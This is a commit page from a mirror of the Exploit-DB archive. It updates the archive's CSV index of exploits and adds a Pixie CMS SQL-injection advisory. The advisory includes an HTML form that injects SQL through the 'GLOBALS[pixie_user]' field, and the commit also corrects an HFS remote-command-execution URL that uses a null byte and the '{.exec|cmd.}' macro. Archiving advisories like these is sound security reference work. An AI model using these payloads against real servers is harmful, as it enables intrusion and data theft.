bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 11_17_2014

Browse source
This commit is contained in:
Offensive Security 2014-11-17 04:48:09 +00:00
parent 998a91f75a
commit 8484833cfa
4 changed files with 25 additions and 6 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

11
files.csv
View file

@ -25886,7 +25886,7 @@ id,file,description,date,author,platform,type,port
28892,platforms/php/webapps/28892.txt,"RSSonate Project_Root Parameter Remote File Include Vulnerability",2006-11-01,Arab4services,php,webapps,0 28892,platforms/php/webapps/28892.txt,"RSSonate Project_Root Parameter Remote File Include Vulnerability",2006-11-01,Arab4services,php,webapps,0
28893,platforms/php/webapps/28893.pl,"KnowledgeBuilder 2.2 visEdit_Control.Class.PHP Remote File Include Vulnerability",2006-11-08,igi,php,webapps,0 28893,platforms/php/webapps/28893.pl,"KnowledgeBuilder 2.2 visEdit_Control.Class.PHP Remote File Include Vulnerability",2006-11-08,igi,php,webapps,0
28894,platforms/windows/dos/28894.txt,"Outpost Firewall PRO 4.0 - Local Denial of Service Vulnerability",2006-11-01,"Matousec Transparent security",windows,dos,0 28894,platforms/windows/dos/28894.txt,"Outpost Firewall PRO 4.0 - Local Denial of Service Vulnerability",2006-11-01,"Matousec Transparent security",windows,dos,0
28895,platforms/linux/dos/28895.txt,"Linux Kernel 2.6.x SquashFS Double Free Denial of Service Vulnerability",2006-11-02,LMH,linux,dos,0 28895,platforms/linux/dos/28895.txt,"Linux Kernel 2.6.x - SquashFS Double Free Denial of Service Vulnerability",2006-11-02,LMH,linux,dos,0
28896,platforms/php/webapps/28896.txt,"RunCMS 1.x Avatar Arbitrary File Upload Vulnerability",2006-11-02,securfrog,php,webapps,0 28896,platforms/php/webapps/28896.txt,"RunCMS 1.x Avatar Arbitrary File Upload Vulnerability",2006-11-02,securfrog,php,webapps,0
28897,platforms/windows/dos/28897.txt,"Microsoft Internet Explorer 7.0 MHTML Denial of Service Vulnerability",2006-11-02,"Positive Technologies",windows,dos,0 28897,platforms/windows/dos/28897.txt,"Microsoft Internet Explorer 7.0 MHTML Denial of Service Vulnerability",2006-11-02,"Positive Technologies",windows,dos,0
28898,platforms/php/webapps/28898.txt,"FreeWebShop 2.2 Index.PHP SQL Injection Vulnerability",2006-11-02,Spiked,php,webapps,0 28898,platforms/php/webapps/28898.txt,"FreeWebShop 2.2 Index.PHP SQL Injection Vulnerability",2006-11-02,Spiked,php,webapps,0
@ -27668,7 +27668,7 @@ id,file,description,date,author,platform,type,port
30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 chat/users_popupL.php3 Multiple Parameter XSS",2007-12-04,beenudel1986,php,webapps,0 30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 chat/users_popupL.php3 Multiple Parameter XSS",2007-12-04,beenudel1986,php,webapps,0
30848,platforms/php/webapps/30848.txt,"Joomla 1.5 RC3 com_content index.php view Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0 30848,platforms/php/webapps/30848.txt,"Joomla 1.5 RC3 com_content index.php view Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0
30849,platforms/php/webapps/30849.txt,"Joomla 1.5 RC3 com_search Component index.php Multiple Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0 30849,platforms/php/webapps/30849.txt,"Joomla 1.5 RC3 com_search Component index.php Multiple Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0
30850,platforms/multiple/remote/30850.txt,"HFS HTTP File Server 2.2/2.3 - Arbitrary File Upload Vulnerability",2007-12-05,"Luigi Auriemma",multiple,remote,0 30850,platforms/multiple/remote/30850.txt,"Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload Vulnerability",2007-12-05,"Luigi Auriemma",multiple,remote,0
30851,platforms/php/webapps/30851.txt,"VisualShapers ezContents 1.4.5 File Disclosure Vulnerability",2007-12-05,p4imi0,php,webapps,0 30851,platforms/php/webapps/30851.txt,"VisualShapers ezContents 1.4.5 File Disclosure Vulnerability",2007-12-05,p4imi0,php,webapps,0
30852,platforms/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 PHP_SELF Trigger_Error Function Cross-Site Scripting Vulnerability",2007-12-06,imei,php,webapps,0 30852,platforms/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 PHP_SELF Trigger_Error Function Cross-Site Scripting Vulnerability",2007-12-06,imei,php,webapps,0
30853,platforms/php/webapps/30853.txt,"OpenNewsletter 2.5 Compose.PHP Cross-Site Scripting Vulnerability",2007-12-06,Manu,php,webapps,0 30853,platforms/php/webapps/30853.txt,"OpenNewsletter 2.5 Compose.PHP Cross-Site Scripting Vulnerability",2007-12-06,Manu,php,webapps,0
@ -27863,7 +27863,7 @@ id,file,description,date,author,platform,type,port
31053,platforms/php/remote/31053.php,"PHP <= 5.2.5 cURL 'safe mode' Security Bypass Vulnerability",2008-01-23,"Maksymilian Arciemowicz",php,remote,0 31053,platforms/php/remote/31053.php,"PHP <= 5.2.5 cURL 'safe mode' Security Bypass Vulnerability",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
31054,platforms/linux/dos/31054.txt,"SDL_image 1.2.6 Invalid GIF File LWZ Minimum Code Size Remote Buffer Overflow Vulnerability",2008-01-23,"Gynvael Coldwind",linux,dos,0 31054,platforms/linux/dos/31054.txt,"SDL_image 1.2.6 Invalid GIF File LWZ Minimum Code Size Remote Buffer Overflow Vulnerability",2008-01-23,"Gynvael Coldwind",linux,dos,0
31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products Remote Information Disclosure Vulnerability",2008-01-23,"AmnPardaz ",asp,webapps,0 31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products Remote Information Disclosure Vulnerability",2008-01-23,"AmnPardaz ",asp,webapps,0
31056,platforms/windows/remote/31056.py,"HFS HTTP File Server 1.5/2.x Multiple Security Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0 31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Security Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
31057,platforms/osx/dos/31057.html,"Apple iPhone Mobile Safari Memory Exhaustion Remote Denial of Service Vulnerability",2008-01-24,fuzion,osx,dos,0 31057,platforms/osx/dos/31057.html,"Apple iPhone Mobile Safari Memory Exhaustion Remote Denial of Service Vulnerability",2008-01-24,fuzion,osx,dos,0
31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts 'user_login.asp' Multiple SQL Injection Vulnerabilies",2008-01-25,milad_sa2007,asp,webapps,0 31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts 'user_login.asp' Multiple SQL Injection Vulnerabilies",2008-01-25,milad_sa2007,asp,webapps,0
31059,platforms/asp/webapps/31059.txt,"E-SMART CART 'Members Login' Multiple SQL Injection Vulnerabilies",2008-01-25,milad_sa2007,asp,webapps,0 31059,platforms/asp/webapps/31059.txt,"E-SMART CART 'Members Login' Multiple SQL Injection Vulnerabilies",2008-01-25,milad_sa2007,asp,webapps,0
@ -31218,7 +31218,7 @@ id,file,description,date,author,platform,type,port
34664,platforms/ios/webapps/34664.txt,"Briefcase 4.0 iOS - Code Execution & File Include Vulnerability",2014-09-15,Vulnerability-Lab,ios,webapps,0 34664,platforms/ios/webapps/34664.txt,"Briefcase 4.0 iOS - Code Execution & File Include Vulnerability",2014-09-15,Vulnerability-Lab,ios,webapps,0
34666,platforms/php/webapps/34666.py,"ALCASAR <= 2.8.1 - Remote Root Code Execution Vulnerability",2014-09-15,eF,php,webapps,80 34666,platforms/php/webapps/34666.py,"ALCASAR <= 2.8.1 - Remote Root Code Execution Vulnerability",2014-09-15,eF,php,webapps,80
34667,platforms/linux/shellcode/34667.c,"Connect Back Shellcode - 139 bytes",2014-09-15,MadMouse,linux,shellcode,0 34667,platforms/linux/shellcode/34667.c,"Connect Back Shellcode - 139 bytes",2014-09-15,MadMouse,linux,shellcode,0
34668,platforms/windows/remote/34668.txt,"HFS HTTP File Server 2.3.x - Remote Command Execution",2014-09-15,"Daniele Linguaglossa",windows,remote,80 34668,platforms/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution",2014-09-15,"Daniele Linguaglossa",windows,remote,80
34669,platforms/multiple/remote/34669.rb,"Railo Remote File Include",2014-09-15,metasploit,multiple,remote,80 34669,platforms/multiple/remote/34669.rb,"Railo Remote File Include",2014-09-15,metasploit,multiple,remote,80
34670,platforms/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer Arbitrary File Upload",2014-09-15,metasploit,multiple,remote,8400 34670,platforms/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer Arbitrary File Upload",2014-09-15,metasploit,multiple,remote,8400
34671,platforms/java/remote/34671.rb,"SolarWinds Storage Manager Authentication Bypass",2014-09-15,metasploit,java,remote,9000 34671,platforms/java/remote/34671.rb,"SolarWinds Storage Manager Authentication Bypass",2014-09-15,metasploit,java,remote,9000
@ -31388,7 +31388,7 @@ id,file,description,date,author,platform,type,port
34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 'req' Parameter Local and Remote File Include Vulnerabilities",2010-01-19,indoushka,php,webapps,0 34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 'req' Parameter Local and Remote File Include Vulnerabilities",2010-01-19,indoushka,php,webapps,0
34850,platforms/php/webapps/34850.txt,"eXV2 CMS Multiple Cross Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,php,webapps,0 34850,platforms/php/webapps/34850.txt,"eXV2 CMS Multiple Cross Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,php,webapps,0
34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 (joblogs.php, jobid param) - SQL Injection",2014-10-02,wishnusakti,php,webapps,80 34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 (joblogs.php, jobid param) - SQL Injection",2014-10-02,wishnusakti,php,webapps,80
34852,platforms/php/webapps/34852.txt,"HTTP File Server 2.3a, 2.3b, 2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",php,webapps,80 34852,platforms/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a, 2.3b, 2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",windows,webapps,80
34853,platforms/windows/remote/34853.c,"PowerDVD 5.0.1107 'trigger.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,"Inj3cti0n P4ck3t",windows,remote,0 34853,platforms/windows/remote/34853.c,"PowerDVD 5.0.1107 'trigger.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,"Inj3cti0n P4ck3t",windows,remote,0
34854,platforms/php/webapps/34854.txt,"All In One Wordpress Firewall 3.8.3 - Persistent XSS Vulnerability",2014-10-02,Vulnerability-Lab,php,webapps,80 34854,platforms/php/webapps/34854.txt,"All In One Wordpress Firewall 3.8.3 - Persistent XSS Vulnerability",2014-10-02,Vulnerability-Lab,php,webapps,80
34855,platforms/windows/dos/34855.pl,"ALPHA Player 2.4 '.bmp' File Buffer Overflow Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0 34855,platforms/windows/dos/34855.pl,"ALPHA Player 2.4 '.bmp' File Buffer Overflow Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0
@ -31740,3 +31740,4 @@ id,file,description,date,author,platform,type,port
35243,platforms/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/workingSetManager.jsp workingSet Parameter XSS",2008-04-24,Rob,multiple,remote,0 35243,platforms/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/workingSetManager.jsp workingSet Parameter XSS",2008-04-24,Rob,multiple,remote,0
35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 Malformed Message Denial Of Service Vulnerability",2011-01-19,"Craig Freyman",windows,dos,0 35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 Malformed Message Denial Of Service Vulnerability",2011-01-19,"Craig Freyman",windows,dos,0
35245,platforms/php/webapps/35245.txt,"PHPAuctions 'viewfaqs.php' SQL Injection Vulnerability",2011-01-19,"BorN To K!LL",php,webapps,0 35245,platforms/php/webapps/35245.txt,"PHPAuctions 'viewfaqs.php' SQL Injection Vulnerability",2011-01-19,"BorN To K!LL",php,webapps,0
35251,platforms/php/webapps/35251.txt,"Pixie CMS 1.0.4 'admin/index.php' SQL Injection Vulnerability",2011-01-20,"High-Tech Bridge SA",php,webapps,0

Can't render this file because it is too large.

18
platforms/php/webapps/35251.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/45937/info
Pixie is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Pixie CMS 1.04 is vulnerable; other versions may also be affected.
NOTE (May 10, 2011): This BID was previously titled 'Pixie Multiple SQL Injection Vulnerabilities'. It has been re-written because one of the vulnerabilities duplicates an issue described in BID 34189 (Pixie CMS SQL Injection and Cross Site Scripting Vulnerabilities).
<form action="http://www.example.com/admin/index.php" method="post" name="main" >
<input name="username" value="1" type="hidden">
<input name="password" value="1" type="hidden">
<input name="login_submit" value="1" type="hidden">
<input name="GLOBALS[pixie_user]" value="123'SQL_CODE_HERE" type="hidden">
<input type="submit" value="submit" name="submit" />
</form>

2
platforms/windows/remote/34668.txt
View file

@ -18,7 +18,7 @@ begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
it will not handle null byte so a request to it will not handle null byte so a request to
http://localhost:80/search=%00{.exec|cmd.} http://localhost:80/?search=%00{.exec|cmd.}
will stop regex from parse macro , and macro will be executed and remote code injection happen. will stop regex from parse macro , and macro will be executed and remote code injection happen.

0
platforms/php/webapps/34852.txt → platforms/windows/webapps/34852.txt
View file